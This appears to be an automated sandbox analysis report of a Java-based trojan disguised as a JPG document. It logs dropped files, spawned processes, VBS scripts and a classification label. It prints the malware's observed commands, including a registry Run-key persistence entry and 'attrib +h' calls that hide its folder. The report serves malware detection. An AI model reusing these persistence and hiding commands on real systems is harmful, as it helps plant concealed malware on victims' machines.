Creates license or readme file

Show sources

Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\README.txt
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME-JAVAFX.txt
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\THIRDPARTYLICENSEREADME.txt

Drops PE files

Show sources

Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\instrument.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\glass.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\unpack200.exe
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsoundds.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\deploy.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\sunmscapi.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\pack200.exe
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_iio.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\decora_sse.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\ktab.exe
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\rmid.exe
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\dcpr.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\t2k.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\kcms.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfxmedia.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_d3d.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\w2k_lsa_auth.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsound.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2iexp.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\keytool.exe
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\hprof.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\wsdetect.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\tnameserv.exe
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\gstreamer-lite.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\zip.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2native.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\unpack.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\splashscreen.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font_t2k.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\rmiregistry.exe
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exe
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\nio.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\java-rmi.exe
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\msvcr100.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\resource.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exe
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_sw.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\orbd.exe
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jsdt.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\mlib_image.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\kinit.exe
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\klist.exe
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\awt.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\npt.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\deployJava1.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\msvcr100.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\net.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\javaws.exe
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jdwp.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\dt_shmem.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfr.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jfxwebkit.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\dt_socket.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\ssv.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jawt.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_es2.dll
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	File created: C:\Users\LUKETA~1\AppData\Local\Temp\Windows8952294696781336921.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\prism_common.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2launcher.exe
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\servertool.exe
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\management.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\npjp2.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\bci.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\j2pcsc.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jp2ssv.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\lcms.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jpeg.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\glib-lite.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\ssvagent.exe
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\j2pkcs11.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\verify.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\sunec.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\eula.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\java.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\java.exe
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\policytool.exe
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\client\jvm.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jli.dll
Source: C:\Windows\System32\xcopy.exe	File created: C:\Users\user\AppData\Roaming\Oracle\bin\jjs.exe

May use bcdedit to modify the Windows boot settings

Show sources

Source: java.exe

Binary or memory string: 0?9bcdedit.exe

Drops files with a non-matching file extension (content does not match file extension)

Show sources

Source: C:\Windows\System32\xcopy.exe

File created: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.cpl

Spreading:

Enumerates the file system

Show sources

Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	File opened: C:\Users\user\AppData\Roaming\Oracle\lib\
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	File opened: C:\Users\user\AppData\Roaming\Oracle\lib\ext\
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	File opened: C:\Users\user\AppData\Roaming\
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	File opened: C:\Users\user\
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	File opened: C:\Users\user\AppData\Roaming\Oracle\
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	File opened: C:\Users\user\AppData\

System Summary:

Found graphical window changes (likely an installer)

Show sources

Source: Window Recorder

Window detected: More than 3 window changes detected

Uses new MSVCR Dlls

Show sources

Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe

File opened: C:\Program Files\Java\jre1.8.0_40\bin\msvcr100.dll

Binary contains paths to debug symbols

Show sources

Source:	Binary string: msvcr100.i386.pdb source: javaw.exe
Source:	Binary string: d:\re\puppet\workspace\8-2-build-windows-i586-cygwin\jdk8u40\2855\build\windows-i586\jdk\objs\libverify\verify.pdb source: javaw.exe
Source:	Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdbP8PP@Y source: java.exe, javaw.exe
Source:	Binary string: d:\re\puppet\workspace\8-2-build-windows-i586-cygwin\jdk8u40\2855\build\windows-i586\jdk\objs\libawt\awt.pdb source: javaw.exe, java.exe
Source:	Binary string: d:\re\puppet\workspace\8-2-build-windows-i586-cygwin\jdk8u40\2855\build\windows-i586\jdk\objs\libnio\nio.pdb source: javaw.exe, java.exe
Source:	Binary string: d:\re\puppet\workspace\8-2-build-windows-i586-cygwin\jdk8u40\2855\build\windows-i586\jdk\objs\libnet\net.pdb source: javaw.exe, java.exe
Source:	Binary string: C:\Users\Win10\Desktop\RetriveTitle_vb2010\Release\TitleWindow.pdb source: java.exe, javaw.exe
Source:	Binary string: D:\re\puppet\workspace\8-2-build-windows-i586-cygwin\jdk8u40\2855\build\windows-i586\hotspot\windows_i486_compiler1\product\jvm.pdb source: javaw.exe
Source:	Binary string: C:\Users\Windows10\Desktop\RetriveTitle\x64\Release\TitleWindow.pdb source: java.exe, javaw.exe
Source:	Binary string: d:\re\puppet\workspace\8-2-build-windows-i586-cygwin\jdk8u40\2855\build\windows-i586\jdk\objs\java_objs\java.pdb source: java.exe
Source:	Binary string: d:\re\puppet\workspace\8-2-build-windows-i586-cygwin\jdk8u40\2855\build\windows-i586\jdk\objs\libjava\java.pdbW" source: javaw.exe, java.exe
Source:	Binary string: d:\re\puppet\workspace\8-2-build-windows-i586-cygwin\jdk8u40\2855\build\windows-i586\jdk\objs\libawt\awt.pdb8^ source: javaw.exe, java.exe
Source:	Binary string: d:\re\puppet\workspace\8-2-build-windows-i586-cygwin\jdk8u40\2855\build\windows-i586\jdk\objs\libzip\zip.pdb source: javaw.exe, java.exe
Source:	Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\x64\Release\CryptUtil.pdb source: java.exe, javaw.exe
Source:	Binary string: d:\re\puppet\workspace\8-2-build-windows-i586-cygwin\jdk8u40\2855\build\windows-i586\jdk\objs\libmanagement\management.pdbi: source: javaw.exe
Source:	Binary string: d:\re\puppet\workspace\8-2-build-windows-i586-cygwin\jdk8u40\2855\build\windows-i586\jdk\objs\javaw_objs\javaw.pdb source: javaw.exe
Source:	Binary string: C:\Users\Windows10\Desktop\CryptUtil_DLL_Visual Studio 10\Release\CryptUtil.pdb source: java.exe, javaw.exe
Source:	Binary string: d:\re\puppet\workspace\8-2-build-windows-i586-cygwin\jdk8u40\2855\build\windows-i586\jdk\objs\libjava\java.pdb source: javaw.exe, java.exe
Source:	Binary string: d:\re\puppet\workspace\8-2-build-windows-i586-cygwin\jdk8u40\2855\build\windows-i586\jdk\objs\libsunec\sunec.pdb source: javaw.exe, java.exe
Source:	Binary string: d:\re\puppet\workspace\8-2-build-windows-i586-cygwin\jdk8u40\2855\build\windows-i586\jdk\objs\libmanagement\management.pdb source: javaw.exe
Source:	Binary string: d:\re\puppet\workspace\8-2-build-windows-i586-cygwin\jdk8u40\2855\build\windows-i586\jdk\objs\libnet\net.pdbI source: javaw.exe, java.exe

Classification label

Show sources

Source: classification engine

Classification label: mal92.evad.expl.troj.winJAR@152/348@0/3

Creates files inside the user directory

Show sources

Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-312302014-279660585-3511680526-1004\83aa4cc77f591dfc2374580bbd95f6ba_041d84af-7e76-450d-8340-55db3c73c359

Creates temporary files

Show sources

Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe

File created: C:\Users\LUKETA~1\AppData\Local\Temp\hsperfdata_user

Executable is probably coded in java

Show sources

Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe

Section loaded: C:\Program Files\Java\jre1.8.0_40\bin\client\jvm.dll

Executes visual basic scripts

Show sources

Source: unknown

Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive2520289818372255555.vbs

Queries process information (via WMI, Win32_Process)

Show sources

Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\attrib.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cmd.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\System32\cscript.exe	WMI Queries: IWbemServices::ExecQuery - SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process

Reads software policies

Show sources

Source: C:\Windows\System32\cmd.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Sample is known by Antivirus (Virustotal or Metascan)

Show sources

Source: 75Doc 0.26777400 15041397050000000jpg.jar

Virustotal: hash found

Spawns processes

Show sources

Source: unknown	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c 7za.exe x -y -oC:\jar 'C:\Users\user\Desktop\75Doc 0.26777400 15041397050000000jpg.jar'
Source: unknown	Process created: C:\Windows\System32\7za.exe 7za.exe x -y -oC:\jar 'C:\Users\user\Desktop\75Doc 0.26777400 15041397050000000jpg.jar'
Source: unknown	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /c java.exe -jar 'C:\Users\user\Desktop\75Doc 0.26777400 15041397050000000jpg.jar' OnayiZufuhugu.OgiyizEfahiGu.Main >> C:\cmdlinestart.log 2>&1
Source: unknown	Process created: C:\Program Files\Java\jre1.8.0_40\bin\java.exe java.exe -jar 'C:\Users\user\Desktop\75Doc 0.26777400 15041397050000000jpg.jar' OnayiZufuhugu.OgiyizEfahiGu.Main
Source: unknown	Process created: C:\Program Files\Java\jre1.8.0_40\bin\java.exe 'C:\Program Files\Java\jre1.8.0_40\bin\java.exe' -jar C:\Users\LUKETA~1\AppData\Local\Temp\_0.4312212827200392546983382786626386.class
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive2520289818372255555.vbs
Source: unknown	Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive2520289818372255555.vbs
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive194914766236682624.vbs
Source: unknown	Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive194914766236682624.vbs
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive3159448250120760692.vbs
Source: unknown	Process created: C:\Windows\System32\xcopy.exe xcopy 'C:\Program Files\Java\jre1.8.0_40' 'C:\Users\user\AppData\Roaming\Oracle\' /e
Source: unknown	Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive3159448250120760692.vbs
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive8817309470254096997.vbs
Source: unknown	Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive8817309470254096997.vbs
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe
Source: unknown	Process created: C:\Windows\System32\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v GboKDMbfKti /t REG_EXPAND_SZ /d '\'C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe\' -jar \'C:\Users\user\eDdlsoVKfgW\AknzQIkoyKh.qmSBQy\'' /f
Source: unknown	Process created: C:\Windows\System32\attrib.exe attrib +h 'C:\Users\user\eDdlsoVKfgW\.'
Source: unknown	Process created: C:\Windows\System32\attrib.exe attrib +h 'C:\Users\user\eDdlsoVKfgW'
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe -jar C:\Users\user\eDdlsoVKfgW\AknzQIkoyKh.qmSBQy
Source: unknown	Process created: C:\Users\user\AppData\Roaming\Oracle\bin\java.exe C:\Users\user\AppData\Roaming\Oracle\bin\java.exe -jar C:\Users\LUKETA~1\AppData\Local\Temp\_0.94322696032766358809744035144248591.class
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive6799039488535261462.vbs
Source: unknown	Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive6799039488535261462.vbs
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive6418174406144645399.vbs
Source: unknown	Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive6418174406144645399.vbs
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive3450254285310729085.vbs
Source: unknown	Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive3450254285310729085.vbs
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive2857528709846908978.vbs
Source: unknown	Process created: C:\Windows\System32\cmd.exe cmd.exe
Source: unknown	Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive2857528709846908978.vbs
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\7za.exe 7za.exe x -y -oC:\jar 'C:\Users\user\Desktop\75Doc 0.26777400 15041397050000000jpg.jar'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Java\jre1.8.0_40\bin\java.exe java.exe -jar 'C:\Users\user\Desktop\75Doc 0.26777400 15041397050000000jpg.jar' OnayiZufuhugu.OgiyizEfahiGu.Main
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe	Process created: C:\Program Files\Java\jre1.8.0_40\bin\java.exe 'C:\Program Files\Java\jre1.8.0_40\bin\java.exe' -jar C:\Users\LUKETA~1\AppData\Local\Temp\_0.4312212827200392546983382786626386.class
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive2520289818372255555.vbs
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive194914766236682624.vbs
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe	Process created: C:\Windows\System32\xcopy.exe xcopy 'C:\Program Files\Java\jre1.8.0_40' 'C:\Users\user\AppData\Roaming\Oracle\' /e
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe	Process created: C:\Windows\System32\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v GboKDMbfKti /t REG_EXPAND_SZ /d '\'C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe\' -jar \'C:\Users\user\eDdlsoVKfgW\AknzQIkoyKh.qmSBQy\'' /f
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe	Process created: C:\Windows\System32\attrib.exe attrib +h 'C:\Users\user\eDdlsoVKfgW\.'
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe	Process created: C:\Windows\System32\attrib.exe attrib +h 'C:\Users\user\eDdlsoVKfgW'
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe	Process created: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe -jar C:\Users\user\eDdlsoVKfgW\AknzQIkoyKh.qmSBQy
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive3159448250120760692.vbs
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive8817309470254096997.vbs
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive2520289818372255555.vbs
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive194914766236682624.vbs
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive3159448250120760692.vbs
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive8817309470254096997.vbs
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: C:\Users\user\AppData\Roaming\Oracle\bin\java.exe C:\Users\user\AppData\Roaming\Oracle\bin\java.exe -jar C:\Users\LUKETA~1\AppData\Local\Temp\_0.94322696032766358809744035144248591.class
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive6799039488535261462.vbs
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\LUKETA~1\AppData\Local\Temp\Retrive3450254285310729085.vbs
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Roaming\Oracle\bin\javaw.exe	Process created: unknown unknown
